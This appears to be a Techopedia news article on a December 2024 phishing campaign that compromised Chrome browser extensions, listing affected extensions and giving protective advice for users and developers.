Cybercriminals have unleashed a large-scale attack on popular Chrome browser extensions, potentially compromising more than 2.5 million users’ data.
Rather than relying on the popular tactic of creating fake extensions in the Chrome Web Store, this campaign infects legitimate apps with malicious code.
As of December 30, 2024, at least 26 widely used extensions have been infected, leading to stolen user data, cookies, and even reports of hijacking multi-factor authentication sessions.
Techopedia explores the tactics behind this campaign, the browser extensions impacted, and essential tips to protect yourself and your data.
Key Takeaways
- A large-scale cyberattack is targeting known Chrome browser extensions, leaving at least 26 extensions compromised.
- The breach potentially exposes over 2.5 million users to data and credential theft.
- Black hat hackers are targeting developers to load malicious code in legitimate extensions by impersonating Google Chrome Web Store Developer Support.
- The number of breached browser extensions could rise in the following days.
How Hackers Target Developers to Load Malicious Code in Legitimate Extensions
The California-based Cyberhaven, a data protection company, was the first to confirm the breach, followed by reports of attacks centered on VPN and generative AI-based browser extensions.
By December 30, the threat campaign had affected at least 26 browser extensions installed by over 2.5 million users. This number could continue to grow in the coming week.
The unknown cybercriminals behind this campaign are exclusively targeting developers who work with the Chrome Web Store.
Unlike other browser extension attacks, where threat actors create fake apps, this campaign infects legitimate apps with malicious code. The end goal is stealing user information at scale.
The coordinated cyber attack against web browser extensions, which began mid-December and continues to unravel, works in a unique way.
The cyber attack begins when black hat hackers send phishing emails to browser extension companies and their developers. These emails impersonate Google Chrome Web Store Developer Support and mislead and pressure developers by falsely claiming that their “extension is at imminent risk of removal” due to “a violation of Developer Program Policies”.
The email is a lure to trick developers into giving away sensitive data, which is later used to load malicious code into a legitimate app to steal users’ cookies and access tokens.
What Browser Extensions Have Been Hacked?
Cybersecurity researchers from Secure Annex listed the following browser extensions as impacted, some of which have been since patched from the Chrome App Store:
- VPNCity
- Parrot Talks
- Uvoice
- Internxt VPN
- Bookmark Favicon Changer
- Castorus
- Wayin AI
- Search Copilot AI Assistant for Chrome
- VidHelper – Video Downloader
- AI Assistant – ChatGPT and Gemini for Chrome
- Vidnoz Flex – Video recorder & Video share
- TinaMind – The GPT-4o-powered AI Assistant!
- Bard AI chat
- Reader Mode
- Primus (prev. PADO)
- Tackker – online keylogger tool
- AI Shop Buddy
- Sort by Oldest
- Rewards Search Automator
- Earny – Up to 20% Cash Back
- ChatGPT Assistant – Smart Search
- Keyboard History Recorder
- Email Hunter
- Visual Effects for Google Meet
- Cyberhaven security extension V3
- GraphQL Network Inspector
- GPT 4 Summary with OpenAI
- Vidnoz Flex – Video recorder & Video share
- YesCaptcha assistant
The total number of users of these web browser extensions is over 2.5 million people. The number of breached browser extensions could rise in the following days.
Analysis of the malicious code found that C2 attacker-controlled servers are being used to steal data. Additionally, a large number of redirects to malicious domains have been found.
Cybersecurity researchers are still trying to figure out most of the malicious code and what it does, as the hackers strongly obfuscated the code.
There are reports of threat actors also stealing session cookies in this campaign to bypass users’ Google 2FA sessions.
The malicious code in this campaign redirects users to fake and malicious sites through search query takeovers and redirections. This can lead to identity and credential theft, activity tracking, and remote command execution.
Basically, threat actors can take over users’ browsers.
Sophisticated Browser Hijack
To date, it is unknown who is the actor behind this wave of cyber attacks against browser extension developers.
As the techniques used by attackers continue to develop, other threat actors may join in, seizing the opportunity.
While many affected developers reported email phishing as the attack vector, it is possible that other infiltration methods have been deployed.
Browser extension hijacking is not uncommon. However, loading malicious code into legitimate apps is something not seen every day in cybersecurity.
Browser extensions on Chrome’s official site are being removed to prevent users from downloading extensions that are operating as malware. In the meantime, developers work on and deploy patches.
Due to the scale of this attack, cybersecurity teams and companies are still playing catch up. An automated vector of attack could be the reason why this attack is scaling fast.
It’s clear that threat actors have in their hands a long list of emails belonging to browser extension developers. These are most likely being fed to automated phishing tools, speeding the distribution of the campaign.
Developer emails are publicly listed on Chrome Store but these emails are usually used to report bugs. It is unclear if the threat actor has obtained information belonging to developers from another breach or leak.
Tirath Ramdas, AI software developer and founder of Chamomile.ai, spoke to Techopedia about browser extension security.
“There is a perception that browser extensions are plugins and, as such, would not be capable of much harm.
“But in reality, browser extensions and web service workers sit in a highly privileged position, potentially intercepting the visible and non-visible content related to every web page viewed by the user.”
Ramdas said that consumers have become more aware of the risks around downloading and running software from the Internet, and browsers and operating systems like Windows and MacOS do a good job of protecting users from malware.
“But this awareness and protection does not extend to browser extensions,” Ramdas said.
The Bottom Line: How To Keep Safe
Because a significant number of websites, IPs, and domains have been linked to this widespread campaign, and different hacking techniques have also been identified, there is no single security patch or unique solution that users or developers can deploy as a silver bullet.
If you are a user and have downloaded one of the impacted browser extensions we recommend you uninstall it, clear your browser cache, and reinstall the extension if patched.
Additionally, you might want to look at your browser extensions’ permissions. Changing your password and enabling multi-factor authentication may be a burden but it is a necessary step for those impacted.
On the other hand, developers and browser extension companies have a harder road ahead. They must audit their browser extensions to double-check the integrity of their extensions.
They must also look for suspicious activity and spread the word among developers to watch out for phishing.
Browsers are considered a treasure trove for cybercriminals, as they store a wide range of personal information.
Remember, only install browser extensions you are familiar with. Stay away from extensions with a low number of users, and read the users’ reviews before installing it on your browser.
FAQs
What is the scale of the Chrome browser extension cyberattack?
How are hackers compromising Chrome extensions?
What should I do if I’ve installed a compromised extension?
What data can hackers access through compromised extensions?
How can users avoid downloading malicious Chrome extensions?
How can developers protect their browser extensions?
References
- When Good Extensions Go Bad: Takeaways from the Campaign Targeting Browser Extensions (Hacker News)
- Secure Annex – Enterprise Browser Extension Security & Management Platform (Secure Annex)
- Tirath Ramdas – Chamomile.ai | LinkedIn (Linkedin)
- Chamomile.ai (Chamomile)